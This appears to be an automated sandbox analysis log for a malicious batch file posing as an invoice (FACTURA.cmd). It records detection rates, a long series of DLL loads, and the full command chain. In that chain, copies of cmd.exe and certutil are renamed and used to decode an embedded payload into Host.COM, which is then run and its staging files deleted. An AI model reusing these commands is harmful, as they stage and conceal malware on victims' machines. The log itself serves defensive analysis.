      Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: FACTURA.cmdReversingLabs: Detection: 33%
      Source: FACTURA.cmdVirustotal: Detection: 34%
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FACTURA.cmd" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3
      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\Host.COM C:\Users\Public\Libraries\Host.COM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3 Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10 Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\Host.COM C:\Users\Public\Libraries\Host.COMJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S Jump to behavior
      Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3 Jump to behavior
      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10 Jump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: version.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: url.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: ieframe.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: userenv.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: netutils.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: wldp.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: propsys.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
